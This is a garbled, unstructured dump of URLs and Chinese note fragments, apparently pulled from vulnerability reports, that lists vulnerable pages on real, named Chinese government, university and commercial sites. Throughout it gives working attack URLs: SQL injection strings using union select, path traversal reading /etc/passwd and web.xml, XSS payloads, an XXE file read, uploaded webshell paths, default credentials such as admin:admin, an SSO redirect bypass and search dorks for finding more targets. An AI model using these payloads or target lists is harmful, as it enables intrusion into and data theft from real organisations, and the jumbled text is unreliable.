http://www.myhack58.com/Article/html/3/62/2012/35468.htm http://120.199.223.78/oa/Mintec/accessory_upload.asp?form=AddJobContactShan&variable=Accessory http://125.210.34.236/index.action http://www.verycd.com/shop/list/video/ http://www.amazon.cn/%E7%99%BD%E5%B8%BD%E5%AD%90%E8%AE%B2Web%E5%AE%89%E5%85%A8-%E5%90%B4%E7%BF%B0%E6%B8%85/dp/B007L5BZKG/ref=sr_1_1?ie=UTF8&qid=1399286811&sr=8-1&keywords=%E7%99%BD%E5%B8%BD%E5%AD%90 http://www.cinsa.cn/sitecn/union_danwei.aspx?id=0 http://www.cinsa.cn/sitecn/search.aspx?keyword= http://www.cctraffic.com.cn/modals.jsp?bid=27&aid=1694 http://cczfbz.changchun.gov.cn/modal.jsp?aid=12141 http://221.8.13.176/modal.jsp?aid=7 http://www.cccyzgw.gov.cn/modal.jsp?aid=961 http://221.8.38.134/zhujian/modal.jsp?aid=39640 http://www.ccsjzglz.cn/modal.jsp?aid=317 http://www.jlnanx.com/modal.jsp?aid=749 http://www.jlsnsxh.com/modal.jsp?aid=27 http://www.ccjks.com/model.jsp?id=620&aid=45 http://221.8.38.134/nasg/modal.jsp?aid=8364 http://www.ccfwy.gov.cn/ztyj/index.jsp http://target/cms/system/selectUsers.jsp url:http://city2010.house.sina.com.cn/myphoto.php?uid=1731978885&type_ext=1&ctype=1 http://jfl.czedu.com.cn/index301-img/xwpd2.php?xxid=62&id=14146 http://jfl.czedu.com.cn/index301-img/xwpd2.php?xxid=62&id=14146 http://jfl.czedu.com.cn/index301-im http://111.205.155.6/fckeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://agent.xinnet.com/html/index.htm,fiddler断点截包,更改X-Forwarded-For字段:192.168.1.1',服务器报500错误,如图: http://calendar.hexun.com/iframe_line.aspx?ct=2&enddate=2014-05-07&et=1&isseach=0&sct=1&startdate=2013-05-07 http://calendar.hexun.com/iframe_line.aspx?ct=2&enddate=2014-05-07&et=200000&isseach=0&sct=1&startdate=2013-05-07 http://www.taoshouyou.com/plugin.php?id=onshuo:buy&gid=16772&buy_amount=1 http://www.taoshouyou.com/plugin.php?id=onshuo:dc_second&gameid=9 http://bbs.gome.com.cn/thread-52588-1-1.html http://www.yiliang.gov.cn/ http://61.163.192.103:9999/cszm/login.action http://61.163.192.103:9999/cszm/bak.jsp http://ui.letv.com/ http://bbs.wangjiu.com/forum.php http://licaike.hexun.com/GjzDetail.action?prodCode=400008&prodType=S http://licaike.hexun.com/GjzDetail.action?prodCode=400008%20and%201=1&prodType=S http://licaike.hexun.com/GjzDetail.action?prodCode=400008%20and%201=2&prodType=S http://licaike.hexun.com/test.php sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin www.goapk.com http://g.pptv.com/ http://www.enetedu.com/index.php/Course2/teachScience?&name=%B9%A4%D1%A7中的name参数存在SQL注入漏洞,用sqlmap测试如下: http://www.ahjcy.gov.cn/jcy-news/newsinfo.jsp?id=9160 http://315.stock.hexun.com/ http://315.stock.hexun.com/login.action http://www.taoshouyou.com/taoshouyou.rar http://www.cqyc.gov.cn/jis/interface/offer.jsp?flag=user http://wwww.sihong.gov.cn/jis/interface/offer.jsp?flag=user http://www.wooyun.org http://www.wooyun.org http://pushmail.263.net/ http://pushmail.263.net/login_check.php http://cmwq.eisaas.cn/xsgj/index.jsp http://124.119.4.30/ http://www.114menhu.com/ www.114menhu.com http://www.114menhu.com http://127.0.0.1/showuser.aspx?orderby=111111&ordertype=%22%3C/script%3E%3Cimg%20src=1%20onerror=alert%281%29%3E&page=1 http://127.0.0.1/showuser.aspx?orderby=%22%3C/script%3E%3Cimg%20src=1%20onerror=alert%281%29%3E&ordertype=111111&page=1 http://10.65.40.6/showtemplate.aspx http://db.auto.sohu.com/baike_upload/baike_update.sip?id=31 http://monitor.jlu.edu.cn/cacti/graph_view.php?action=tree&tree_id=3&leaf_id=44 http://yn-zwdt.chinayn.gov.cn http://www.linyiyj.gov.cn/hack.txt http://www.linyiyj.gov.cn/index.htm http://gp.pep.com.cn/ http://gp.pep.com.cn/guopei/website/news/info.aspx?content_uid=d1d9c156-fe98-4d36-a9ac-4d2c0c4c2793 http://www.mailer.com.cn/Products6.html,用户量挺大。 http://www.mailer.com.cn/demo/ http://mail.mailer.cn/ http://mail.mailer.cn/jdwm/cgi/getpwd.cgi http://mail.mailer.cn/ http://mail.mailer.cn/ http://mail.mailer.cn/ http://mail.mailer.cn/jdwm/cgi/file_disk.cgi?0+0+0++unlink=007 http://mail.mailer.cn/jdwm/cgi/file_disk.cgi?0+0+0++unlink=007 www.csbt.org.cn http://www.csbt.org.cn/association/association_detail.php?resp_id=39 http://www.csbt.org.cn/upload/upload_detail.php?files_type=1&files_id=102 http://www.csbt.org.cn/tanslation/tanslation_detail.php?id=94&add_flag=1 http://www.csbt.org.cn/association/association_detail2.php?plangg_id=33&t=1 http://www.csbt.org.cn/association/association_detail1.php?bylaws_id=16 http://www.csbt.org.cn/tanslation/tanslation_detail.php?id=89 http://www.csbt.org.cn/news/news_detail.php?n_id=25534&t=1 http://ad.goodbaby.com/multi.php?ids=54545 http://ad.goodbaby.com/multi.php?ids=54545 http://ad.goodbaby.com/multi.php?ids=54545 http://ad.goodbaby.com/multi.php?ids=54545 http://tuan.damaow.com/?code=save&mod=../../../../../../../../../../etc/passwd%00.jpg http://www.verycd.com/base/add http://fx.sx.189.cn/login.do http://fx.sx.189.cn:80/ http://www.hl.jcy.gov.cn/xiangxi.aspx?ID=832&mkbm=17 http://see.bupt.edu.cn/school/about/teachers_1.php?id=43 http://see.bupt.edu.cn/school/english/undergraduates3.php?id=1 http://202.***.***.50/login/loginpageforuserb.aspx?LogoutURL=%2flogin URL:http://59.37.49.171:8089/WEB/memberpage/indexB.aspx http://www.suyaxing.com:81/WS2004/default.asp http://www.fjzhyz.cn/ http://www.fjzhyz.cn/ws2004/sysmanage/default.asp http://xsst.sinaapp.com/test/xxe_sys.dtd file:///etc/passwd http://www.cqpost.com/Ask/list.aspx?type=NotDeal&catalogID=4 http://tdemo002mp.v5portal.com/ URL:http://tdemo002mp.v5portal.com/articlelist.aspx?wd=1&btnsearch3=1&id=0 inurl:chn*/article.jsp?articleId= inurl:chn*/article.jsp?articleId= http://www.sxky.cn/chn200911180959039/article.jsp?articleId=12645744 http://www.gdpcc.com/chn200905080757464/article.jsp?articleId=293 http://www.csagency.com.cn/chn200909301343130/article.jsp?articleId=2343749 http://www.114menhu.com/UMS/logout/logout.htm admin:admin http://tlzw.tongliao.gov.cn/servlet/FileDownload?filepath=D:\%C9%CF%BA%A3%D7%BF%B7%B1\Tomcat6_tongliao\webapps\ROOT\WEB-INF\web.xml&dispname=web.xml http://www.zwfw.gov.cn/index/downLoadGonggaoAtta.action?filePath=D:\zfwork\tomcat_web_new\webapps\ROOT\WEB-INF\web.xml&fileName=web.xml http://www.whxzfw.gov.cn/index/downLoadFile.action?filePath=/WEB-INF/web.xml&fileName=web.xml http://www.xczwzx.gov.cn/FileDownload?filepath=F:\%C9%CF%BA%A3%D7%BF%B7%B1\Tomcat\webapps\ROOT\WEB-INF/web.xml&dispname=web.xml http://221.229.249.58 http://www.yhmohrss.gov.cn/lemis/netweb/detail/download.jsp?url=/WEB-INF/&filename=web.xml http://www.zjhz.hrss.gov.cn/lemis/netweb/detail/download.jsp?url=/WEB-INF/&filename=web.xml http://www.hzsrsj.gov.cn//lemis/netweb/detail/download.jsp?url=/WEB-INF/&filename=web.xml http://www.zjhz.lss.gov.cn//lemis/netweb/detail/download.jsp?url=/WEB-INF/&filename=web.xml http://search.sina.com.cn/api/apiindex.php?s=subscribe&a=getkeys&stype=1%20and%201=2%20union%20select%201,2,3,database%28%29,user%28%29%23&format=json&callback=jsonp1399471108722 http://search.sina.com.cn/api/apiindex.php?s=subscribe&a=getkeys&stype=1%20and%201=2%20union%20select%201,2,3,group_concat%28table_name%29,5%20from%20information_schema.tables%23&format=json&callback=jsonp1399471108722 inurl:apas/portal/ http://website.com/apas/portal/account/checkAcc.jsp?username=admin http://www.smzwzx.com http://www.dhxzfw.gov.cn http://www.sybmfw.gov.cn http://admin.xzcs.gov.cn/newsinfo.aspx?id=14 http://www.ksgl.gov.cn/lttd.php?id=29&page=43 http://www.ksgl.gov.cn/upload/1399450827_dama.php.jpg http://www.timber2005.com/Product_sy.html http://px2.timber2005.com/Web_Org/CW_Default.aspx?infoid=4102&couseid=4102 http://help.tipask.com/q-19260.html http://help.tipask.com/question/editanswer/3608/0.html www.tuniu.com/u/modPasswordSubmit,post“password=123456789&tel=1381682XXXX” http://www.timber2005.com/Product_sy.html http://px2.timber2005.com/Web_Org/User_Retrieve.aspx http://www.***p.gov.cn//index/downLoadFile.action?filePath=/admin/login.jsp&fileName=test.txt inurl:search/list.php?siteId= http://www.cangshan.gov.cn/m/search/list.php?siteId=1 http://xxgk.yingzhou.gov.cn/TMP/left_exa.shtml?action=getContent&SSID=1'&etc=1399449825591 http://xxgk.ahjs.gov.cn/TMP/left_exa.shtml?action=getContent&SSID=1 http://xxgk.ahqy.gov.cn/TMP/left_exa.shtml?action=getContent&SSID=4105 http://mail.10086.cn/ https://www.cmpassport.com/umcsso/notify?passid=***(*号替换为想进入的飞信号)即可进入想进入的飞信号邮箱。 http://www.dczfw.gov.cn/eWebEditor/admin_uploadfile.asp?id=24&dir=../../../ http://sy.uxin.com/game/gamesearch.act?keyWord= admin:123456 http://insurancecard.sino-life.com:7001/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd http://wooyun.org/bugs/wooyun-2010-059247 http://wo.zdnet.com.cn/page/list1.php http://xss.re http://www.diyou.cc/?plugins&area=&class=u_sel&name=work_&q=areas&type=p,c&value=1 http://www.diyou.cc/?plugins&area=&class=u_sel&name=work_&q=areas&type=p,c&value=1 http://lady.weibo.com/hiddphp.php?ac=getjcwb&bid=1 http://lady.weibo.com/hiddphp.php?ac=getjcwb&bid=1 http://www.yanta.gov.cn/english/Information.jsp?id=1170&fid=1196&nid=1196 http://www.yanta.gov.cn/gpw/hdjl/ldxx.jsp?flag=3&LeadXx=&pageCurrent=1 http://www.xachanba.com.cn/front/search/search_detail.jsp?id=5961&nid=737 http://www.xachanba.com.cn/front/zxft/zxftviewEv.go?id=6 http://www.hcnu.edu.cn/1.php http://a2platinum.umaman.com/admin http://eip.countrygarden.com.cn:8080/manager/ http://www.wooyun.org/bugs/wooyun-2014-059827/ http://www.fjzhyz.cn/ws2004 http://www.fjzhyz.cn/ws2004/sysmanage/Resource/resset/default.asp http://blog.xdf.cn/ http://blog.xdf.cn/article-3013426.html http://drops.wooyun.org/papers/1377 http://demo.hanweb.com/jsearch/down.jsp?abspathfile=c:/boot.ini&filename=xxx.txt http://demo.hanweb.com/jsearch/down.jsp?pathfile=./../jsearch/down.jsp&filename=xxx.txt http://202.119.47.33:81/zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php http://opac.xmulib.org/zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php http://opac.wzu.edu.cn/zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php http://dx.10006.info/dx/sousuo.do?action=jixing&jixing=iphone http://www.5ibp.cn/sousuo.do?action=jixing&jixing=iphone http://fx.sx.189.cn/sousuo.do?action=jixing&jixing=中兴 http://video.gzlib.gov.cn/Movie.asp?vProgram_id=9357 http://nba.hupu.com/trade/的页面,跟进就得到了注射点http://nba.hupu.com/trade/select_player.php?select=select_team&team1=8&team2=18&team3=&team4=1: http://bi.anzhi.com http://bi.anzhi.com:80/ http://a1.greentree.cn:8029/Api/index.php/User/getMembershipCardInfo/ ttp://a1.greentree.cn:8029/Api/index.php/User/getCouponsList/ http://a1.greentree.cn:8029/Api/index.php/Permanent/getPermanentHotelList/ http://220.191.210.37/zwdt/qlsx_search.jsp?value= http://220.191.210.37/zwdt/qlsx_search.jsp?curpage=1&type=FX&value= http://122.225.14.156/3wr/ps/channel/articleContent/articleContent.jsp?catalogId=703142&articleId=1559771 http://sb.hyshbx.gov.cn/3wr/ps/channel/articleContent/articleContent.jsp?catalogId=703142&articleId=1559771 http://ggfw.wxlss.gov.cn/3wr/ps/channel/articleContent/articleContent.jsp?catalogId=617299&articleId=823744 http://www.jxhrss.gov.cn:8071/3wr/ps/channel/articleContent/articleContent.jsp?catalogId=759966&articleId=24356 http://www.jxhrss.gov.cn:8071/3wr/ps/channel/articleContent/articleContent.jsp?catalogId=759966&articleId=24356 http://www.firstelite.net/index.asp http://www.google.com.hk/search?q=+%E6%95%B0%E5%AD%97%E6%A0%A1%E5%9B%AD%E7%BB%BC%E5%90%88%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0++%E5%8D%9A%E5%86%A0%E7%A7%91%E6%8A%80+%E7%89%88%E6%9D%83%E6%89%80%E6%9C%89&hl=zh-CN&newwindow=1&safe=strict&cad=&oq=+%E6%95%B0%E5%AD%97%E6%A0%A1%E5%9B%AD%E7%BB%BC%E5%90%88%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0++%E5%8D%9A%E5%86%A0%E7%A7%91%E6%8A%80+%E7%89%88%E6%9D%83%E6%89%80%E6%9C%89&gs_l=heirloom-serp.12...908.908.0.1453.1.1.0.0.0.0.0.0..0.0....0...1ac.1.34.heirloom-serp..1.0.0.7fmjMFtQOSI http://www.xaltedu.com:9001/Login.aspx,用户名密码输入 http://www.xaltedu.com:9001/ www.xaltedu.com:9001 http://zp.sta.edu.cn/zpsys/index-news.jsp?WID=ti8tzkvb-2soj-hlzq-awtj-799trk9d9eju http://zp.sta.edu.cn/zpsys/index-news.jsp?WID=ti8tzkvb-2soj-hlzq-awtj-799trk9d9eju http://zp.immu.edu.cn/zpsys/index-news.jsp?WID= http://zp.immu.edu.cn/zpsys/index-news.jsp?WID= http://zp.njxzc.edu.cn/zpsys/index-news.jsp?WID= http://zp.njxzc.edu.cn/zpsys/index-news.jsp?WID= http://basic.10jqka.com.cn/interactive/stockall/000528/?seq=468053 http://a1.greentree.cn:8029/Admin/index.php/Public/login http://kaoqin.gb246.com http://yoyo.263.net/gift.php?act=detail&cid=0&g_id=10136 http://www.byecity.com/www.byecity.com.zip http://www.bjprd.com.cn/index.asp http://www.bjprd.com.cn/lecture.asp http://www.bjprd.com.cn/zcpt/index.asp http://www.bjprd.com.cn/PE/index.asp http://www.bjprd.com.cn/PE/common/info.asp?id=213&str=1 http://www.bjprd.com.cn/PE/common/info.asp?id=213 http://www.bjprd.com.cn/PE/common/cxinfomx.asp?id=43912 http://cloud.xiaoi.com/login!logout.do http://222.73.228.81:8100/task/admin!auth.action http://cloud.xiaoi.com:8888/index.php http://www.ycztb.com/ycsite/newxygh/XXGH.aspx?XieYiLeiBie=0 http://www.shinan.gov.cn/list.asp?catid=22 http://v5.wqetrip.com/ inurl:/triplist.aspx?typeID=1 inurl:/triplist.aspx?typeID= http://v5.wqetrip.com/triplist.aspx?typeID=1 http://v5.wqetrip.com/triplist.aspx?typeID=1 http://v5.wqetrip.com/triplist.aspx?typeID=1 http://www.sqlmap.org http://www.yhfw.gov.cn/was/portals/webSend/entity_show.jsp?fileName=%CA%DA%C8%A8%CE%AF%CD%D0%CA%E9.doc&unid=20110803-13F03C6EF05E5062B773-11 http://v.demo.linksoon.net/ http://www.tangsuanradio.com/ http://yun.263.net http://pan.baidu.com/share/link?shareid=1831333754&uk=2099536883 http://61.135.129.80:8080/nihaobj.java http://61.135.129.80:8080/domain_auth/ http://www.cosco-logistics.gz.cn/manage/ http://a1.greentree.cn:8029/Bak/ http://100.hibnet.com/ http://www.bjprd.com.cn/index.asp http://www.bjprd.com.cn/lecture.asp http://www.bjprd.com.cn/zcpt/index.asp http://www.bjprd.com.cn/sbweb/index.asp http://www.bjprd.com.cn/zcgkweb/login.asp http://www.bjprd.com.cn/jjweb/index.asp http://news.buct.edu.cn/cms/bjhgdx/xww/search_channel.jsp http://news.buct.edu.cn/cms/ http://portal.buct.edu.cn/cas/login?service=http%3A%2F%2F202.4.130.240%3A8080%2Fcms%2F http://www.renhua.gov.cn/platform/login!login.action http://www.westarsoft.com/ inurl:web!getItem.action inurl:sp/out/index.jsp http://www.yzz.cn/ http://tool.oschina.net/codeformat/xml file:///etc/passwd file:///home/run/ssh_go.sh http://mall.95572.com/,fiddler断点截包,在请求头上加入X-Forwarded-For www.anzhi.com http://www.anzhi.com/change_pwd.php?code=933836&id=******&r=1399543904.15&verify_type=1 http://sale.jd.com/act/BtKFCOrMuIEo.html?erpad_source=erpad#none http://activity.jd.com/vote/vote.action?callback=jQuery16206548841977491975_1399544587745&id=300&pin=&itemId=1109&_=1399544679248 http://bj.esf.focus.cn/ajax/get_house_map_mark.json.php http://www.rgrcb.com/manage/Manage_Index.php http://mail.comingchina.com/webmail/client/oab/index.php?module=operate&action=member-get&page=1&orderby=&is_reverse=1&keyword=mailtest3721 http://mail.comingchina.com/webmail/client/mail/index.php?module=operate&action=attach-upload http://mail.comingchina.com/webmail/client/cache/{user_id}/{file_id}.php http://mail.comingchina.com/webmail/client/cache/78609/13995534500.php http://v5mall.v5shop.com.cn/productreview.aspx?productid=703 http://v5mall.v5shop.com.cn/productask.aspx?productid=703 http://demo.zoomla.cn/Customer.aspx http://law.hexun.com/commons/img.jsp site:gov.cn inurl:ApproveSiteAction!findApproveGuide.action http://dev.mgame.baidu.com/sign/add http://ycimg.m.duoku.com/group1/M00/05/A5/CgoAMVNrex6ECRpRAAAAAOQaGIc280.php line:198 https://publib.boulder.ibm.com/infocenter/bladectr/documentation/index.jsp?topic=/com.ibm.bladecenter.advmgtmod.doc/adv_mgt_mod_product_page.html http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5073887 http://1.1.1.1/phpinfo.php http://www.bookschina.com/smsadmin/message/groupremark.aspx?id=835 http://fj.bnet.cn/Page/HotProList.aspx?tagid=21%20and%201=1 http://fj.bnet.cn/Page/HotProList.aspx?tagid=21%20and%201=2 http://www.wxmetro.net:8888/cms/editor/filemanager/browser/default/browser.html?Type=../../../webapps/cms&Connector=connectors/jsp/connector http://t.hexun.com/k/topic.html?value=%25u89E3%25u76D8%7E%25u4E3B%25u529B http://demo.zoomla.cn/Guest/ask/List.aspx http://hanweb.com/col/col41/index.html http://jy.qhnu.edu.cn/admin/manager/admin_voting_show.php?page_id=12 http://touchapp.mmb.cn/wap/vp/handlePhoneProduct.do?method=buyProduct&uuniq=1399482571758403 http://app.suning.com/android/app?gid=1 http://app.suning.com/android/app/page?id=637501 http://photo.huatu.com/photo.rar https://sso.shengpay.com/login https://sso.shengpay.com/login?appId=zf481&service=http://www.shengpay.com/account/loginValidate.htm https://sso.shengpay.com/login?appId=zf425&service=http://www.fangxinmai.com/account/loginValidate.htm https://sso.shengpay.com/login?appId=zf425&service=http://xxx.com www.fangxinmai.com这个service,服务端仅仅做了起始字符串的匹配,So,构造Url https://sso.shengpay.com/login?appId=zf425&service=http://www.fangxinmai.com.xxx.com http://www.welcomeinn.com.cn/about_yl.asp?id=93 http://www.welcomeinn.com.cn/about_yl.asp?id=-93 http://www.welcomeinn.com.cn/about_yl.asp?id=93 http://www.welcomeinn.com.cn/about_yl.asp?id=93 http://www.welcomeinn.com.cn/about_yl.asp?id=93 http://app.suning.com/win/software/detail?guid=787d85fa-61f7-4ebc-a26b-7f01565971c4%27%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,user%28%29,4,5,6,7,8%23 http://app.suning.com/index.php?route=common/home/ajUserBrand&brand_id=32%27%20and%201=2%20union%20select%201,2,3,4,5,6,7,user%28%29%23 http://app.suning.com/android/app/comment?pack=com.soulgame.bubble%27%20and%201=2%20union%20select%201,user%28%29,3,4,5%23&page=1&_=1399622792464 http://app.suning.com/softwarelist.php?gid=4&cid=190 http://www.gridinn.com/pay/payonline.aspx?id=1164279 http://demo.zoomla.cn/3d/InsertContext.aspx http://cloud.suning.com/cloud-web/appCenter/search.htm?categoryId=9&version=1399626466076 sctjj.gov.cn/news_view.asp?newsid=2334 http://www.sandpay.com.cn/website/cardservice/shopquery2.do?goto=detail&id=97667 http://gx.10086.cn/cmop/showWebNewsIndex.action http://www.szks.gov.cn/Info_View.aspx?id=637 http://www.szks.gov.cn/Info_View.aspx?id=637 http://www.sqlmap.org www.szks.gov.cn\session http://dm.zoomla.cn/guestbook/发给同学,同学用手机打开链接就弹出js代码! http://agri.suning.com.cn分站存在多处注入点 http://agri.suning.com.cn/news.php?t=-1%22 http://agri.suning.com.cn/NewsDetail.php?id=298&t= http://agri.suning.com.cn/JobsDetail.php?id=-1+OR+17-7%3d10 http://agri.suning.com.cn/Controller/NewsController.php http://www.longene.org/fileDownload.php?id=73&page=download http://www.longene.org/fileDownload.php?id=65%20%20and%201=2%20union%20select%201,2,@@version,4,5,6,7,8,9&page=download http://www.longene.org/test.php http://www.longene.org/phpinfo.php http://61.146.213.170/ http://www.taobei.gov.cn/ArticleDetail.aspx?i=1779 http://www.gxwzfda.gov.cn/shenlan.asp http://www.wzpeace.com http://www.wzpeace.com/attached/help.php http://finance.qingdaonews.com/financewap/list.aspx?qx=0&fl=0 http://finance.qingdaonews.com/financewap/list.aspx?qx=0&fl=0 http://www.sqlmap.org http://www.dingdong.cn/broadband/detail.aspx?id=599 http://www.dingdong.cn/broadband/detail.aspx?id=599 http://www.sqlmap.org www.dingdong.cn\session http://gqx.hebstd.gov.cn/Products/ProductDetail.aspx?tableid=29 http://127.0.0.1/Plugins/ckfinder/ckfinder.html http://127.0.0.1/UploadFiles/files/1.asp/3.GIF http://127.0.0.1/plugins/imageupload.aspx http://psy.ruc.edu.cn/activityinfo.php?id=8 http://ts.house.hebnews.cn/Outside/msglist_s.aspx?st=9,70,80,99 http://www.zzbwd.com/wzl/admin_loginadd.asp http://www.zzjntw.com/wzl/admin_loginadd.asp http://www.hnyycs.com/wzl/admin_loginadd.asp http://www.jtdny.com/wzl/admin_loginadd.asp http://www.hnwzhf.cn/wzl/admin_loginadd.asp http://www.zuoan168.com/wzl/admin_left.asp http://www.zzzhuangji.com/wzl/admin_left.asp http://www.yypep.com/wzl/admin_left.asp http://www.hnxqjd.com/wzl/admin_left.asp http://www.vorlon.cn/wzl/admin_left.asp http://www.gsdaiban.com/wzl/admin_left.asp http://www.hnmaosen.com/wzl/admin_left.asp http://www.zzjntw.com/wzl/admin_loginadd.asp http://diy.91.com http://diy.91.com/login.php diy.91.com/tools/log/ post:logtype=../../../../../../../../../../etc/passwd%00.jpg http://www.95572.com/jsp/new_index/select_multi_data2.jsp?p=G http://www.95572.com/jsp/new_index/select_multi_data2.jsp http://www.95572.com/jsp/new_index/select_multi_data2.jsp http://118.122.112.89/khoa/index.jsp http://118.122.112.89/khoa/page/system/ggmm.jsp?fl=1 http://118.122.112.89/khoa/page/upload/down_file.jsp?fileName=1 http://118.122.112.89/khoa/download.jsp?path=khoa&name=index.jsp http://www.hr135.com/member/index.php?M=index&C=info http://www.ytoxl.com/manager/html http://m2.ytoxl.com/manager/html http://fio.ytoxl.com/manager/html http://www.fmxedu.com/ http://www.fmxedu.com/www.rar http://www.scwsjd.com/ws/news_enter.action http://xxsw.nuc.edu.cn/cms/subnews.php?id=869 inurl:portal/xzsp/wssbinfo.aspx http://www.website.com/portal/xzsp/wssbinfo.aspx?id=624&title= http://www.taoshouyou.com/plugin.php?id=onshuo:buy&gid=12381&buy_amount=1 http://www.visitsz.com:801/2013Winter/detail.asp?id=637 http://www.visitsz.com:801/admin/login.asp http://www.xxssfj.gov.cn/ http://www.xxxgtj.gov.cn/ http://www.jhqz.com/ http://www.xxairpull.com/ http://www.sxcompany.cn/ http://www.34455.com.cn/ http://www.riugor.com/ http://www.hnyxyz.com/ http://www.xxzhongcai.com/ http://www.yqdbj.com/ http://www.whwxjx.com/ http://www.xxxiangyi.com/ http://www.jlmgjx.com/ http://www.hnhffy.com/ http://www.36699.cn/ http://www.xxktdq.com/ http://www.xxhtfm.com/ http://www.dbxnp.com/ http://www.xinxi365.cn/ http://www.yangzhushebei.com/ http://www.cxnjzzc.com/ http://www.spyxuesci.asia/ http://www.xhzdjx.com/ http://www.xxssfj.gov.cn/Picture_Show.php?id=122 http://www.xxssfj.gov.cn/Info_Show.php?id=1016 http://www.xxssfj.gov.cn/Info_Show.php?ColumnID=14&id=949 http://www.xxairpull.com/cpinfo.php?cpid=467 http://www.xxairpull.com/newsinfo.php?id=87&classid=12 http://www.xxairpull.com/newsinfo.php?id=91 http://www.34455.com.cn/newsinfo.php?id=181&classid=11 http://www.34455.com.cn/cpinfo.php?cpid=476 http://www.34455.com.cn/cp_type.php?smallclassid=96 http://www.34455.com.cn/qyinfo.php?id=31 http://www.riugor.com/newsinfo.php?id=157&classid=11 http://www.riugor.com/cpinfo.php?cpid=451 http://www.riugor.com/news_class.php?classid=11 http://www.riugor.com/english/cpinfo.php?cpid=451 http://www.riugor.com/cp_type.php?smallclassid=98 http://www.xxzhongcai.com/jszcinfo.php?tl_id=31 http://www.xxzhongcai.com/cpinfo.php?product_id=2 http://www.yqdbj.com/newsinfo.php?id=32 http://www.sxsj.gov.cn/Manage/fckeditor/editor/images/smiley/msn/x.asp http://dangxiao.qdu.edu.cn/dangxiao/dx/login.php http://www.ngxfw.gov.cn/dy_show.php?tid=19&id=275 http://www.hzdgxx.org/index.aspx?pageGuid=CA4F6C5C-D834-46F8-9AA7-CFA9FB65BA1C http://www.hzst.gov.cn/index.aspx?newsId=42993&CatalogID=934&PageGuid=4A3B6524-953E-4CA2-A5C4-0DC81BDEF4CC http://hzchzx.cn/index.aspx?pageGuid=505698AB-366C-4C59-B789-F0D342E39758&CatalogID=189 http://www.hzbjzg.org/index.aspx?newsId=10520&CatalogID=47&PageGuid=FD804F14-7CFB-4740-BC00-C9960E36B350 http://www.hzbwxx.com/index.aspx?newsId=10668&CatalogID=32&PageGuid=41A9DA9A-52D0-42A3-B61D-447A6B9ACCA7 http://hzgxsy.net/index.aspx?pageguid=2429F467-97DD-4820-8B3B-F98A37E3562C&NewsID=11402 http://61.175.193.70:99/index.aspx?pageguid=A0FE8D4B-144A-4984-8B36-89D27B907F99 http://yuweishiny.13.dns222.net/index.aspx?pageguid=D5EC1A38-2094-4D2A-8A45-834EBDC335F5&ShopID=10 http://61.175.193.70:99/index.aspx?pageguid=A0FE8D4B-144A-4984-8B36-89D27B907F99 http://www.hzxxsy.com/index.aspx?pageguid=25E37238-3468-45C9-A23B-B69FC8ED1A2C&NewsID=6765 http://220.191.210.97:8080/WebHall/NewsDatail.aspx?newsId=243 http://60.191.18.37:8088/WebHall/NewsDatail.aspx?newsId=3593 http://218.75.32.196:8020/WebHall/NewsDatail.aspx?newsId=3567 http://60.191.17.52/WebHall/NewsDatail.aspx?newsId=3624 http://das.hhtz.gov.cn/archive/index.aspx?pageguid=349219E1-28BB-4849-BE72-2F05EAD8D5B5&CatalogID=742 http://www.bjsqxy.org/index.aspx?pageguid=E2859CC5-DFBC-4066-876B-2E2BA585FDBB http://www.cba.gov.cn/cbastats/match/gamelive.aspx?gameno=CHNW2014 http://english.qqhr.gov.cn/xinwen.php?id=186 http://english.qqhr.gov.cn/manager/index.php http://jld.cq.gov.cn/common/content.jsp?flag=1&id=633 http://www.cq.gov.cn/public-fulltext-client/?bs= inurl:Info!list.action?alias= http://www.hngswj.gov.cn/web/Info!list.action?alias=policy http://222.76.242.83:8080/web/Info!list.action?alias=trends&infoRegion=%E5%B1%B1%E4%B8%9C%E7%9C%81%E5%B7%A5%E5%95%86%E5%B1%80 http://wj.ahaic.gov.cn:8080/GSweb/web/Info!list.action?alias=trends&infoRegion=%E9%A9%AC%E9%9E%8D%E5%B1%B1 http://27.151.116.17:8081/web/Info!list.action?alias=trends&infoRegion=%E7%A6%8F%E5%B7%9E%E5%B8%82 http://www.gzaic315.gov.cn/web/Info!list.action?alias=trends http://wj.ahaic.gov.cn:8080/GSweb/web/Info!list.action?alias=trends&infoRegion=%E9%A9%AC%E9%9E%8D%E5%B1%B1 http://218.22.14.69:8080/GSweb/web/Info!list.action?alias=policy http://www.ccgswljg.gov.cn/web/Info!list.action?alias=news http://wljg.xmgs.gov.cn:8080/web/Info!list.action?alias=laws http://www.guomobile.com/news_show.php?serial=927 http://wpf.cma.gov.cn/ http://tanalytics.tool.chexun.com/intface/recommenddata?callback=recommendDataC&c=5&muid=1 http://wooyun.org/bugs/wooyun-2014-057764 http://wooyun.org/bugs/wooyun-2010-045717 http://mtest1.jiuxian.com/home/index/user/login http://www.fzgwbn.net.cn/adminadmin/_content/_About/AspCms_AboutEdit.asp?id=19 http://www.tba.gov.cn/newsimg/.asp http://www.cnki.com.cn/ http://www.cnki.net/ http://www.yinzuo.cn/counts/admin.asp?view=yinzuo后台弱口令admin/admin http://gslx.yuncng.com:8080/index.jsp http://www.k12.com.cn/ http://www.cmdi.gov.cn:80/ www.cmdi.gov.cn url:http://tdemo010ct.v5shop.com.cn/commond.aspx?id=8 http://agri.suning.com.cn/JobsDetail.php?id=-31%20union%20select%201,2,3,concat_ws%28user%28%29,0x7c,version%28%29,0x7c,database%28%29,@@datadir%29,5,6,7,8,9,0,1,12-- gov.user/index.php http://www.sked.cn/DB/test.cer http://www.sked.cn/DB/test.asp http://expo.pharmnet.com.cn/pro_product/browse.cgi?id=489966&asid=114479 http://www.international.hit.edu.cn/test/ http://studyatsyu.syu.edu.cn/content.asp?id=161 http://zdzsc.zju.edu.cn/ http://zdzsc.zju.edu.cn/index.php?c=Index&a=kind_list&catid=2 http://119.191.58.225/week/open/bid/cms_open_bid.jspx?id=647潍坊市公共资源交易网 http://ggzy.weifang.gov.cn/week/open/bid/cms_open_bid.jspx?id=647 